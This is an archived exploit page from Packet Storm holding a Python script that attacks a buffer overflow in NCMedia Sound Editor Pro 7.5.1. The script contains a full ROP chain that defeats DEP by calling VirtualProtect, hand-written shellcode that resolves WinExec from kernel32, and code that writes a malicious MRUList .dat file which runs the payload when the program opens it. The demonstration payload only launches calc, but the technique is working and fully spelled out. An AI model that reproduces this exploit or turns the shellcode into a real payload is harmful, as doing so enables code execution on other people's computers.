exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NCMedia Sound Editor Pro 7.5.1 Buffer Overflow

NCMedia Sound Editor Pro 7.5.1 Buffer Overflow
Posted Oct 3, 2012
Authored by b33f

NCMedia Sound Editor Pro version 7.5.1 buffer overflow exploit with SEH and DEP.

tags | exploit, overflow
SHA-256 | 4195ae37fdb252cffc6ea369a4e3f28b378fc74c86697f3ab2e437a9b9fbd9c1

NCMedia Sound Editor Pro 7.5.1 Buffer Overflow

Change Mirror Download
#!/usr/bin/python

#---------------------------------------------------------------------------#
# Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP #
# Author: b33f - http://www.fuzzysecurity.com/ #
# OS: Windows 7 Pro SP1 (probably universal across 32-bit) #
# POC - Julien Ahrens XP SP3: http://www.exploit-db.com/exploits/21331/ #
# Software: http://www.soundeditorpro.com/ #
# HOWTO: put the *.dat file in [USER]\Roaming\Sound Editor Pro\ #
# open -> click "File" menu -> calc ;)) #
#---------------------------------------------------------------------------#
# Curiously enough, the only thing that went through the mind of the #
# ROP-Chain as it was executed was "Oh no, not again"! #
#---------------------------------------------------------------------------#

import sys, socket, struct

file="MRUList201202.dat"

#--------------------------------------------------------------------------------------------------------------#
# Semi-Universal ROP chain based entirely on MSVCR70.dll which comes packaged with "NCMedia Sound Editor"... #
#--------------------------------------------------------------------------------------------------------------#
rop = struct.pack('<L',0x7c0126bc) # XCHG EAX,EBP # ADD AL,7C # RETN \
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN |
rop += struct.pack('<L',0x7C0390FD) # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B | MOV VP -> ESI
rop += struct.pack('<L',0x7c023a4f) # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN \
rop += struct.pack('<L',0xFFBF90EF) # NEG is -> 0x00406f11 : jmp esp [SoundEditorPro.exe] | JMP ESP -> EBP
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN [MSVCR70.dll] |
rop += struct.pack('<L',0x7c0126b7) # XCHG EAX,EBP # ADD AL,7C # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN \
rop += struct.pack('<L',0xFFFFFDFF) # Neg is 201-HEX (513-bytes) | Executable Size -> EBX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN |
rop += struct.pack('<L',0x7c01561c) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c026484) # POP EDI # RETN \ ROP-NOP -> EDI
rop += struct.pack('<L',0x7c034e02) # ROP-NOP /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN \
rop += struct.pack('<L',0xFFFFFFC0) # NEG is 0x40 | newProtect -> EDX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN |
rop += struct.pack('<L',0x7c026dc4) # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c034e01) # POP ECX # RETN \ RW lpOldProtect -> ECX
rop += struct.pack('<L',0x7c049001) # lpOldProtect /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN \ NOP padding -> EAX
rop += struct.pack('<L',0x90909090) # NOP /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0126b6) # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN | PUSHAD -> pwnd!!
#--------------------------------------------------------------------------------------------------------------#

#----------------------------------
# Greets to SkyLined, you do great work with shellcode!!
#----------------------------------
calc = (
"\x31\xD2" #
"\x52" #
"\x68\x63\x61\x6C\x63" # Stack has arguments for
"\x89\xE6" # WinExec -> calc
"\x52" #
"\x56" ########
"\x64\x8B\x72\x30" #
"\x8B\x76\x0C" #
"\x8B\x76\x0C" # Found Kernel32
"\xAD" # base address
"\x8B\x30" #
"\x8B\x7E\x18" ########
"\x8B\x5F\x3C" # Found export table offset
"\x8B\x5C\x1F\x78" ########
"\x8B\x74\x1F\x20" # Found export names table
"\x01\xFE" ########
"\x8B\x4C\x1F\x24" # Found export ordinals table
"\x01\xF9" ########
"\x42" #
"\xAD" # Found WinExec ordinal
"\x81\x3C\x07\x57\x69\x6E\x45" #
"\x75\xF5" ########
"\x0F\xB7\x54\x51\xFE" #
"\x8B\x74\x1F\x1C" #
"\x01\xFE" # Pop calc ;))
"\x03\x3C\x96" #
"\xFF\xD7") #

#----------------------------------
# badchars -> '\x00\x0d\x0a'
# 0x0040e02a {pivot 1092} # ADD ESP,444 # RETN [SoundEditorPro.exe]
# ROP-NOP Slide 0x7c034e02 [MSVCR70.dll]
#----------------------------------
b00m = "\x90"*10 + calc
poc = "\x02\x4E\x03\x7C"*61 + rop + b00m + "\x41"*(3880-len(rop + b00m)) + "\x2A\xE0\x40\x00"

try:
print "[*] Creating exploit file...\n"
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!"
except:
print "[!] Error while creating file!"

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    11 Files
  • 8
    Dec 8th
    45 Files
  • 9
    Dec 9th
    9 Files
  • 10
    Dec 10th
    6 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close